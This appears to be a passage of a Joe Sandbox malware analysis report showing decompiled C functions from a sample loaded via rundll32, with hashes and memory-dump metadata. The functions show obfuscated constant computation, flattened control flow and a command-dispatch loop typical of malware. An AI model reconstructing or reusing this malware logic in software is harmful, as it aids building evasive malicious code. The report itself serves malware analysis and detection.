                                                                        • Instruction ID: 2d2181df3d2bb9c93a47c4eee62150f0e4f5b302c766535f93e70661617adfa9
                                                                        • Opcode Fuzzy Hash: 840e47962e3d73477b89a5bfd9ac43b6a925a88084486f6c4384313c70dfcef2
                                                                        • Instruction Fuzzy Hash: D73167719083418FD304EF25DA4A40FBBE1FBD4758F104A2EF485A6220D3B9DA498F87
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E10013D7C(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				signed int _v68;
                                                                        				signed int _v72;
                                                                        				signed int _v76;
                                                                        				signed int _v80;
                                                                        				signed int _v84;
                                                                        				intOrPtr _v88;
                                                                        				intOrPtr _v92;
                                                                        				short _v108;
                                                                        				char* _v112;
                                                                        				char* _v116;
                                                                        				signed int _v120;
                                                                        				char _v124;
                                                                        				char _v644;
                                                                        				char _v1164;
                                                                        				void* __ecx;
                                                                        				void* _t185;
                                                                        				signed int _t212;
                                                                        				signed int _t216;
                                                                        				signed int _t217;
                                                                        				signed int _t218;
                                                                        				signed int _t219;
                                                                        				signed int _t220;
                                                                        				signed int _t221;
                                                                        				void* _t250;
                                                                        
                                                                        				_push(_a12);
                                                                        				_t250 = __edx;
                                                                        				_push(_a8);
                                                                        				_push(_a4);
                                                                        				_push(__edx);
                                                                        				E100056B2(_t185);
                                                                        				_v84 = _v84 & 0x00000000;
                                                                        				_v80 = _v80 & 0x00000000;
                                                                        				_v92 = 0x2af249;
                                                                        				_v88 = 0xa239d;
                                                                        				_v72 = 0x3311;
                                                                        				_v72 = _v72 | 0x7bf224ce;
                                                                        				_v72 = _v72 ^ 0x7bf237de;
                                                                        				_v36 = 0xf7a4;
                                                                        				_v36 = _v36 + 0xffffc682;
                                                                        				_v36 = _v36 + 0xffffc2a9;
                                                                        				_v36 = _v36 ^ 0x000086db;
                                                                        				_v68 = 0xdbd1;
                                                                        				_v68 = _v68 + 0xcfce;
                                                                        				_v68 = _v68 ^ 0x0001a39f;
                                                                        				_v12 = 0x5909;
                                                                        				_v12 = _v12 + 0x65b0;
                                                                        				_v12 = _v12 >> 1;
                                                                        				_v12 = _v12 + 0xffff8c6d;
                                                                        				_v12 = _v12 ^ 0xfffff7ad;
                                                                        				_v44 = 0x56e3;
                                                                        				_v44 = _v44 + 0x126;
                                                                        				_t216 = 9;
                                                                        				_v44 = _v44 / _t216;
                                                                        				_v44 = _v44 ^ 0x00003ea1;
                                                                        				_v8 = 0x9ec;
                                                                        				_t217 = 0xc;
                                                                        				_v8 = _v8 / _t217;
                                                                        				_t218 = 0xf;
                                                                        				_v8 = _v8 / _t218;
                                                                        				_v8 = _v8 ^ 0x5389c1c6;
                                                                        				_v8 = _v8 ^ 0x53898368;
                                                                        				_v56 = 0x8b50;
                                                                        				_t219 = 0x7c;
                                                                        				_v56 = _v56 * 0x7b;
                                                                        				_v56 = _v56 ^ 0x0042a85f;
                                                                        				_v64 = 0xa08d;
                                                                        				_v64 = _v64 + 0xcc80;
                                                                        				_v64 = _v64 ^ 0x00016541;
                                                                        				_v40 = 0x6173;
                                                                        				_v40 = _v40 | 0xc384fcd4;
                                                                        				_v40 = _v40 << 0xf;
                                                                        				_v40 = _v40 ^ 0x7efba2ce;
                                                                        				_v24 = 0xc6dd;
                                                                        				_v24 = _v24 << 5;
                                                                        				_v24 = _v24 + 0xffff231a;
                                                                        				_v24 = _v24 ^ 0x00179bda;
                                                                        				_v48 = 0xc35f;
                                                                        				_v48 = _v48 << 0xc;
                                                                        				_v48 = _v48 >> 0x10;
                                                                        				_v48 = _v48 ^ 0x00004803;
                                                                        				_v32 = 0xc90e;
                                                                        				_v32 = _v32 >> 0xb;
                                                                        				_v32 = _v32 << 0xc;
                                                                        				_v32 = _v32 ^ 0x0001a766;
                                                                        				_v76 = 0x4072;
                                                                        				_v76 = _v76 / _t219;
                                                                        				_v76 = _v76 ^ 0x00003c70;
                                                                        				_v28 = 0x9423;
                                                                        				_v28 = _v28 + 0xffff4e74;
                                                                        				_t220 = 0x19;
                                                                        				_v28 = _v28 * 0x2e;
                                                                        				_v28 = _v28 ^ 0xfffa9c10;
                                                                        				_v16 = 0x38cb;
                                                                        				_v16 = _v16 ^ 0x15f5157f;
                                                                        				_v16 = _v16 << 6;
                                                                        				_v16 = _v16 + 0xf435;
                                                                        				_v16 = _v16 ^ 0x7d4c407a;
                                                                        				_v52 = 0x39bb;
                                                                        				_v52 = _v52 + 0xffffae06;
                                                                        				_v52 = _v52 ^ 0xce0d0fc0;
                                                                        				_v52 = _v52 ^ 0x31f2a856;
                                                                        				_v60 = 0xc52f;
                                                                        				_t221 = 0x65;
                                                                        				_v60 = _v60 / _t220;
                                                                        				_v60 = _v60 ^ 0x00004cfc;
                                                                        				_v20 = 0xe49b;
                                                                        				_v20 = _v20 + 0xf3d2;
                                                                        				_v20 = _v20 / _t221;
                                                                        				_v20 = _v20 ^ 0x00007d6c;
                                                                        				E10001CB3( &_v124, _v12, 0x1e, _v44);
                                                                        				E10001CB3( &_v644, _v8, 0x208, _v56);
                                                                        				E10001CB3( &_v1164, _v64, 0x208, _v40);
                                                                        				E10015891(_a12,  &_v644, _v24, _v48, _v32);
                                                                        				E10015891(_t250,  &_v1164, _v76, _v28, _v16);
                                                                        				_v120 = _v72;
                                                                        				_v116 =  &_v644;
                                                                        				_v112 =  &_v1164;
                                                                        				_v108 = _v68 | _v36;
                                                                        				_t212 = E1001C9E4(_v60, _v20,  &_v124);
                                                                        				asm("sbb eax, eax");
                                                                        				return  ~_t212 + 1;
                                                                        			}

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: z@L}
                                                                        • API String ID: 0-656678828
                                                                        • Opcode ID: 60fa0d3e1590c9607e5d51dbb1653ade0f49e62c408987f7d99e6032664efbe8
                                                                        • Instruction ID: 64054118f8c6f46c4d0f59fa63d6518252241b9f119ebe30aefd6ecd3cb38e95
                                                                        • Opcode Fuzzy Hash: 60fa0d3e1590c9607e5d51dbb1653ade0f49e62c408987f7d99e6032664efbe8
                                                                        • Instruction Fuzzy Hash: 18812072D0020DEBEF14CFA1D98A9DEBBB2FB44314F208159E415B6290D7B91A4ACF54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E10018831(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				char _v52;
                                                                        				char _v60;
                                                                        				intOrPtr _v64;
                                                                        				void* _v68;
                                                                        				char _v120;
                                                                        				void* _t100;
                                                                        				void* _t113;
                                                                        				void* _t117;
                                                                        				void* _t119;
                                                                        				void* _t121;
                                                                        				void* _t123;
                                                                        				void* _t125;
                                                                        				signed int _t131;
                                                                        				signed int _t132;
                                                                        				signed int _t133;
                                                                        				void* _t161;
                                                                        				void* _t163;
                                                                        				void* _t165;
                                                                        				void* _t166;
                                                                        
                                                                        				_t166 = __eflags;
                                                                        				_push(_a4);
                                                                        				_push(__edx);
                                                                        				_push(__ecx);
                                                                        				E100056B2(_t100);
                                                                        				_v40 = 0xa9e3;
                                                                        				_v40 = _v40 | 0x2174341f;
                                                                        				_v40 = _v40 ^ 0x2174d138;
                                                                        				_t161 = 0;
                                                                        				_v28 = 0xd1b7;
                                                                        				_v28 = _v28 >> 6;
                                                                        				_v28 = _v28 >> 0xa;
                                                                        				_v28 = _v28 ^ 0x0000747d;
                                                                        				_v24 = 0x8bdd;
                                                                        				_t131 = 0x3c;
                                                                        				_v24 = _v24 / _t131;
                                                                        				_v24 = _v24 >> 5;
                                                                        				_v24 = _v24 ^ 0x00001716;
                                                                        				_v20 = 0xbd7b;
                                                                        				_t132 = 0x56;
                                                                        				_v20 = _v20 * 0x24;
                                                                        				_v20 = _v20 << 1;
                                                                        				_v20 = _v20 ^ 0x00355362;
                                                                        				_v12 = 0x1776;
                                                                        				_t133 = 0x74;
                                                                        				_v12 = _v12 / _t132;
                                                                        				_v12 = _v12 + 0xffffd771;
                                                                        				_v12 = _v12 * 0x66;
                                                                        				_v12 = _v12 ^ 0xffefd8ce;
                                                                        				_v36 = 0xe780;
                                                                        				_v36 = _v36 + 0xffff8307;
                                                                        				_v36 = _v36 ^ 0x00001dc1;
                                                                        				_v32 = 0x334f;
                                                                        				_v32 = _v32 << 9;
                                                                        				_v32 = _v32 ^ 0x0066d4a3;
                                                                        				_v44 = 0xfc2;
                                                                        				_v44 = _v44 + 0xffff2eb0;
                                                                        				_v44 = _v44 ^ 0xffff18b3;
                                                                        				_v16 = 0xf408;
                                                                        				_v16 = _v16 + 0xffff10d6;
                                                                        				_v16 = _v16 << 0xf;
                                                                        				_v16 = _v16 / _t133;
                                                                        				_v16 = _v16 ^ 0x000527d6;
                                                                        				E1001F3E9(_v40, _v28, _v24, __edx,  &_v120);
                                                                        				_t165 = _t163 + 0x18;
                                                                        				L15:
                                                                        				_t113 = E10009899( &_v52, _v20, _t166,  &_v120, _v12, _v36, _v32);
                                                                        				_t165 = _t165 + 0x10;
                                                                        				if(_t113 != 0) {
                                                                        					__eflags = E1001C04C( &_v68, _v44,  &_v52, _v16);
                                                                        					if(__eflags != 0) {
                                                                        						_t117 = _v64 - 1;
                                                                        						__eflags = _t117;
                                                                        						if(_t117 == 0) {
                                                                        							E100177C0(_v68,  &_v60);
                                                                        						} else {
                                                                        							_t119 = _t117 - 1;
                                                                        							__eflags = _t119;
                                                                        							if(_t119 == 0) {
                                                                        								E10007E34(_v68,  &_v60);
                                                                        							} else {
                                                                        								_t121 = _t119 - 1;
                                                                        								__eflags = _t121;
                                                                        								if(_t121 == 0) {
                                                                        									E10003D4E(_v68,  &_v60);
                                                                        								} else {
                                                                        									_t123 = _t121 - 1;
                                                                        									__eflags = _t123;
                                                                        									if(_t123 == 0) {
                                                                        										E10012965(_v68,  &_v60);
                                                                        									} else {
                                                                        										_t125 = _t123 - 6;
                                                                        										__eflags = _t125;
                                                                        										if(_t125 == 0) {
                                                                        											E10001658(_v68,  &_v60);
                                                                        										} else {
                                                                        											__eflags = _t125 == 1;
                                                                        											if(_t125 == 1) {
                                                                        												E10002DEE(_v68,  &_v60);
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						_t161 = _t161 + 1;
                                                                        						__eflags = _t161;
                                                                        					}
                                                                        					goto L15;
                                                                        				}
                                                                        				return _t161;
                                                                        			}

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: bS5
                                                                        • API String ID: 0-1932987624
                                                                        • Opcode ID: 60c0db7c199690b9a4269612a9ff3c2463bdb260329f2ae53de997cd560263d1
                                                                        • Instruction ID: 23e059ff47e0506498e7a4e708a724e5c8e2fef518cb1c354503f8202edbf6a6
                                                                        • Opcode Fuzzy Hash: 60c0db7c199690b9a4269612a9ff3c2463bdb260329f2ae53de997cd560263d1
                                                                        • Instruction Fuzzy Hash: ED512671D0421EDBDF08CFA1D9468EEBBB1FF44344F148119E405BA294EBB5AB86CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E1001B1D2() {
                                                                        				signed int _v4;
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				unsigned int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				intOrPtr _t110;
                                                                        				intOrPtr _t111;
                                                                        				signed int _t118;
                                                                        				signed int _t119;
                                                                        				signed int _t120;
                                                                        				intOrPtr* _t121;
                                                                        				void* _t123;
                                                                        				void* _t134;
                                                                        				signed int* _t136;
                                                                        
                                                                        				_t136 =  &_v40;
                                                                        				_v40 = 0x70f8;
                                                                        				_v40 = _v40 >> 7;
                                                                        				_v40 = _v40 + 0xffff630a;
                                                                        				_t118 = 0x64;
                                                                        				_v40 = _v40 / _t118;
                                                                        				_v40 = _v40 ^ 0x028f2fd3;
                                                                        				_t134 = 0x35b1160f;
                                                                        				_v16 = 0x47d6;
                                                                        				_v16 = _v16 ^ 0xd8da0719;
                                                                        				_v16 = _v16 >> 1;
                                                                        				_v16 = _v16 ^ 0x6c6d66b3;
                                                                        				_v36 = 0xc09c;
                                                                        				_t119 = 0x42;
                                                                        				_v36 = _v36 / _t119;
                                                                        				_v36 = _v36 | 0x4c951b1c;
                                                                        				_t120 = 0x76;
                                                                        				_v36 = _v36 / _t120;
                                                                        				_v36 = _v36 ^ 0x00a646bb;
                                                                        				_v4 = 0xd906;
                                                                        				_v4 = _v4 + 0xffffa865;
                                                                        				_v4 = _v4 ^ 0x0000cebc;
                                                                        				_v12 = 0x1924;
                                                                        				_v12 = _v12 << 0xa;
                                                                        				_v12 = _v12 ^ 0x5770cda5;
                                                                        				_v12 = _v12 ^ 0x57146551;
                                                                        				_v20 = 0x57d8;
                                                                        				_v20 = _v20 + 0x3c9b;
                                                                        				_v20 = _v20 | 0x6624950d;
                                                                        				_v20 = _v20 + 0x7d86;
                                                                        				_v20 = _v20 ^ 0x662576da;
                                                                        				_v24 = 0x7f33;
                                                                        				_v24 = _v24 + 0x8e9f;
                                                                        				_v24 = _v24 * 0x52;
                                                                        				_v24 = _v24 * 0x41;
                                                                        				_v24 = _v24 ^ 0x15f1c515;
                                                                        				_v8 = 0xdf1f;
                                                                        				_v8 = _v8 ^ 0x9b779287;
                                                                        				_v8 = _v8 << 4;
                                                                        				_v8 = _v8 ^ 0xb774c662;
                                                                        				_v28 = 0x1b91;
                                                                        				_v28 = _v28 ^ 0xac548ac7;
                                                                        				_v28 = _v28 * 0x57;
                                                                        				_v28 = _v28 + 0xffff181d;
                                                                        				_v28 = _v28 ^ 0x90bc1e59;
                                                                        				_v32 = 0x7551;
                                                                        				_v32 = _v32 >> 0xb;
                                                                        				_v32 = _v32 ^ 0xb8e7ca91;
                                                                        				_v32 = _v32 * 0x76;
                                                                        				_v32 = _v32 ^ 0x3ad707f4;
                                                                        				_t121 =  *0x10021404; // 0x0
                                                                        				while(_t134 != 0x472a097) {
                                                                        					if(_t134 == 0x148a4b2c) {
                                                                        						_t111 = E1001D1E3(_v36, _t121, _v4, _t121, _t121, _v12);
                                                                        						_t121 =  *0x10021404; // 0x0
                                                                        						_t136 =  &(_t136[5]);
                                                                        						_t134 = 0x472a097;
                                                                        						 *_t121 = _t111;
                                                                        						continue;
                                                                        					} else {
                                                                        						if(_t134 != 0x35b1160f) {
                                                                        							L8:
                                                                        							if(_t134 != 0xfe78997) {
                                                                        								continue;
                                                                        							}
                                                                        						} else {
                                                                        							_push(_t121);
                                                                        							_t123 = 0x18;
                                                                        							_t121 = E100157E8(_t123);
                                                                        							 *0x10021404 = _t121;
                                                                        							if(_t121 != 0) {
                                                                        								_t134 = 0x148a4b2c;
                                                                        								continue;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					return 0 | _t121 != 0x00000000;
                                                                        				}
                                                                        				_t110 = E1000D6D8(_v20, _v24, _t121, E10016B45, _v8, _t121, 0, _t121, _t121, _v28, _v32);
                                                                        				_t121 =  *0x10021404; // 0x0
                                                                        				_t136 =  &(_t136[9]);
                                                                        				_t134 = 0xfe78997;
                                                                        				 *((intOrPtr*)(_t121 + 0x14)) = _t110;
                                                                        				goto L8;
                                                                        			}


                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Qu
                                                                        • API String ID: 0-3256286041
                                                                        • Opcode ID: 72d9035821b1f87b61d0bef66f101ffc1bb0575628e8c655921ffdd0e755d463
                                                                        • Instruction ID: 993f58a08032508fbc2eaa32d8b7856b11afd01b2926fc56810c97954de9ad7b
                                                                        • Opcode Fuzzy Hash: 72d9035821b1f87b61d0bef66f101ffc1bb0575628e8c655921ffdd0e755d463
                                                                        • Instruction Fuzzy Hash: 63519B72508301DFD348DF25D88690BBBF1FB88758F104A1DF499AA2A0D375DA56CF86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E10018668(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				unsigned int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				char _v44;
                                                                        				signed int _v48;
                                                                        				intOrPtr _v52;
                                                                        				intOrPtr _v56;
                                                                        				intOrPtr _v60;
                                                                        				void* _t124;
                                                                        				signed int _t153;
                                                                        				signed int _t154;
                                                                        				signed int _t155;
                                                                        				signed int _t156;
                                                                        				signed int _t157;
                                                                        				signed int _t158;
                                                                        				signed int _t174;
                                                                        				signed int _t175;
                                                                        				void* _t179;
                                                                        
                                                                        				_t179 = __eflags;
                                                                        				_t174 = _a8;
                                                                        				_push(_t174);
                                                                        				_push(_a4);
                                                                        				_push(__ecx);
                                                                        				E100056B2(_t124);
                                                                        				_v48 = _v48 & 0x00000000;
                                                                        				_v60 = 0x2b6426;
                                                                        				_v56 = 0x6e5114;
                                                                        				_v52 = 0x76edce;
                                                                        				_v28 = 0x79ec;
                                                                        				_t153 = 0x78;
                                                                        				_v28 = _v28 / _t153;
                                                                        				_v28 = _v28 ^ 0x0000650d;
                                                                        				_a8 = 0xe566;
                                                                        				_a8 = _a8 + 0x6996;
                                                                        				_t154 = 0x28;
                                                                        				_a8 = _a8 * 0x2c;
                                                                        				_a8 = _a8 << 6;
                                                                        				_a8 = _a8 ^ 0x0e64e211;
                                                                        				_v16 = 0x462c;
                                                                        				_v16 = _v16 * 0x2a;
                                                                        				_v16 = _v16 * 0x1a;
                                                                        				_v16 = _v16 ^ 0x012b18fd;
                                                                        				_v8 = 0x3be2;
                                                                        				_v8 = _v8 ^ 0xc0b2cfc2;
                                                                        				_v8 = _v8 + 0xffff8202;
                                                                        				_v8 = _v8 + 0xffff281a;
                                                                        				_v8 = _v8 ^ 0xc0b1e356;
                                                                        				_v32 = 0xe529;
                                                                        				_v32 = _v32 | 0xad89a33e;
                                                                        				_v32 = _v32 ^ 0xad89e9bc;
                                                                        				_v12 = 0xc860;
                                                                        				_v12 = _v12 / _t154;
                                                                        				_v12 = _v12 << 8;
                                                                        				_v12 = _v12 ^ 0x00050c31;
                                                                        				_v24 = 0x828e;
                                                                        				_v24 = _v24 >> 0xe;
                                                                        				_v24 = _v24 >> 0xa;
                                                                        				_v24 = _v24 ^ 0x00005687;
                                                                        				_v20 = 0xf702;
                                                                        				_v20 = _v20 << 5;
                                                                        				_t155 = 0x19;
                                                                        				_v20 = _v20 / _t155;
                                                                        				_v20 = _v20 ^ 0x000138d2;
                                                                        				_v40 = 0x21c7;
                                                                        				_t156 = 0x48;
                                                                        				_v40 = _v40 / _t156;
                                                                        				_v40 = _v40 ^ 0x00003778;
                                                                        				_v36 = 0x7572;
                                                                        				_t157 = 0x45;
                                                                        				_v36 = _v36 / _t157;
                                                                        				_v36 = _v36 ^ 0x00006456;
                                                                        				_v44 = E10017B6B();
                                                                        				_a8 = 0x4920;
                                                                        				_t158 = 0x7e;
                                                                        				_a8 = _a8 / _t158;
                                                                        				_a8 = _a8 ^ 0x00000090;
                                                                        				_v28 = 0x69c4;
                                                                        				_v28 = _v28 >> 2;
                                                                        				_v28 = _v28 ^ 0x00001a61;
                                                                        				_t175 = E1000607F(_t158, _t179, _t158, _v28, _a8);
                                                                        				E1000D940(_t174, _v20, _v40, _v36, 1,  &_v44, _t175);
                                                                        				 *((short*)(_t174 + _t175 * 2)) = 0;
                                                                        				return 0;
                                                                        			}

                                                                        0x10018718
                                                                        0x1001871f
                                                                        0x10018726
                                                                        0x1001872d
                                                                        0x1001873b
                                                                        0x1001873e
                                                                        0x10018742
                                                                        0x10018749
                                                                        0x10018750
                                                                        0x10018754
                                                                        0x10018758
                                                                        0x1001875f
                                                                        0x10018766
                                                                        0x1001876d
                                                                        0x10018772
                                                                        0x10018777
                                                                        0x1001877e
                                                                        0x10018788
                                                                        0x1001878d
                                                                        0x10018792
                                                                        0x10018799
                                                                        0x100187a3
                                                                        0x100187a6
                                                                        0x100187a9
                                                                        0x100187bb
                                                                        0x100187c0
                                                                        0x100187cc
                                                                        0x100187d2
                                                                        0x100187d5
                                                                        0x100187dc
                                                                        0x100187e3
                                                                        0x100187e7
                                                                        0x10018806
                                                                        0x1001881d
                                                                        0x10018827
                                                                        0x10018830

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: &d+
                                                                        • API String ID: 0-1856812195
                                                                        • Opcode ID: 930e4a88b72f900f157fc4a04b76e2da3c06cc500f2b69401a2902ce23c90efd
                                                                        • Instruction ID: b02ba9efede8e0657d026f88a3113f5aed79929258dc51e3690d2409ff298ab4
                                                                        • Opcode Fuzzy Hash: 930e4a88b72f900f157fc4a04b76e2da3c06cc500f2b69401a2902ce23c90efd
                                                                        • Instruction Fuzzy Hash: C6511671D00209ABEF08CFA5D94A9EEBBB6FF44314F10C059E514AB290D7B99A54CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E1000D44C(void* __ecx, void* __edx, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				char _v52;
                                                                        				void* _t130;
                                                                        				void* _t135;
                                                                        				signed int _t152;
                                                                        				signed int _t153;
                                                                        				signed int _t154;
                                                                        				signed int _t155;
                                                                        				signed int _t156;
                                                                        				void* _t158;
                                                                        
                                                                        				_t135 = __ecx;
                                                                        				_push(_a16);
                                                                        				_push(_a12);
                                                                        				_v52 = 0x104;
                                                                        				_push(_a8);
                                                                        				_push(0x104);
                                                                        				_push(__edx);
                                                                        				_push(__ecx);
                                                                        				E100056B2(0x104);
                                                                        				_v8 = 0xbcd1;
                                                                        				_t158 = 0;
                                                                        				_t152 = 0x36;
                                                                        				_v8 = _v8 * 0x2e;
                                                                        				_v8 = _v8 / _t152;
                                                                        				_v8 = _v8 ^ 0x7bcd9522;
                                                                        				_v8 = _v8 ^ 0x7bcd7ef1;
                                                                        				_v20 = 0xd074;
                                                                        				_t153 = 0x7c;
                                                                        				_v20 = _v20 / _t153;
                                                                        				_t154 = 7;
                                                                        				_v20 = _v20 / _t154;
                                                                        				_v20 = _v20 ^ 0x00001e29;
                                                                        				_v32 = 0xd525;
                                                                        				_v32 = _v32 << 0xf;
                                                                        				_t155 = 0x6c;
                                                                        				_v32 = _v32 / _t155;
                                                                        				_v32 = _v32 ^ 0x00fcbc52;
                                                                        				_v28 = 0x5229;
                                                                        				_v28 = _v28 | 0x68e90e22;
                                                                        				_v28 = _v28 << 8;
                                                                        				_v28 = _v28 ^ 0xe95e5e4c;
                                                                        				_v24 = 0xbbdc;
                                                                        				_v24 = _v24 + 0xffff5b85;
                                                                        				_t156 = 0x2b;
                                                                        				_v24 = _v24 * 0x5a;
                                                                        				_v24 = _v24 ^ 0x000800d6;
                                                                        				_v12 = 0x4595;
                                                                        				_v12 = _v12 | 0x5bffd677;
                                                                        				_v12 = _v12 + 0xffff91eb;
                                                                        				_v12 = _v12 ^ 0x5bff1f9a;
                                                                        				_v48 = 0x86a3;
                                                                        				_v48 = _v48 | 0x766d4cfb;
                                                                        				_v48 = _v48 ^ 0x766ddf16;
                                                                        				_v36 = 0x4caf;
                                                                        				_v36 = _v36 | 0x279090db;
                                                                        				_v36 = _v36 + 0xdfe5;
                                                                        				_v36 = _v36 ^ 0x2791e7d1;
                                                                        				_v44 = 0x2a6e;
                                                                        				_v44 = _v44 + 0xffff210b;
                                                                        				_v44 = _v44 ^ 0xffff72fc;
                                                                        				_v16 = 0x7a4e;
                                                                        				_v16 = _v16 / _t156;
                                                                        				_v16 = _v16 << 7;
                                                                        				_v16 = _v16 * 0x64;
                                                                        				_v16 = _v16 ^ 0x008e4fe7;
                                                                        				_v40 = 0x3228;
                                                                        				_v40 = _v40 >> 0xd;
                                                                        				_v40 = _v40 ^ 0x00001001;
                                                                        				_t130 = E10003B31(__ecx, __ecx, __ecx, _v40);
                                                                        				_t157 = _t130;
                                                                        				if(_t130 != 0) {
                                                                        					_push(_t135);
                                                                        					_t158 = E1000C62B(_a8, _v32, _v28, _t157, _v24,  &_v52, _v12);
                                                                        					E100078F0(_t157, _v48, _v36, _v44, _v16);
                                                                        				}
                                                                        				return _t158;
                                                                        			}

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: L^^
                                                                        • API String ID: 0-295340116
                                                                        • Opcode ID: fa22bd86a460830a331d50a2ba865589b89019c83ade8a281ebc60d719fb16f5
                                                                        • Instruction ID: 5b9d8352787a9756c3e64560f2c9cebd3d80172517012275b39b5e8c23ac1851
                                                                        • Opcode Fuzzy Hash: fa22bd86a460830a331d50a2ba865589b89019c83ade8a281ebc60d719fb16f5
                                                                        • Instruction Fuzzy Hash: FF514775D00209EBEF04CFA9D94A8EEFBB5FB84314F208159E511B6260D3795A45CF54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: K\n
                                                                        • API String ID: 0-1066067252
                                                                        • Opcode ID: b06382163075361a3c44be5cb64449bbb243bed76c2da9e603d8431d6cc6b667
                                                                        • Instruction ID: 5fd8320ada1694ee6555ad69e33bb7130fac323d7898873b8d76c28e81ceb8ae
                                                                        • Opcode Fuzzy Hash: b06382163075361a3c44be5cb64449bbb243bed76c2da9e603d8431d6cc6b667
                                                                        • Instruction Fuzzy Hash: 78310576D0020CFBDF05CFE5C8898DEBBB1FB48304F108199EA18A6250D3B59A65DF80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E1000A83A(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
                                                                        				signed int _v8;
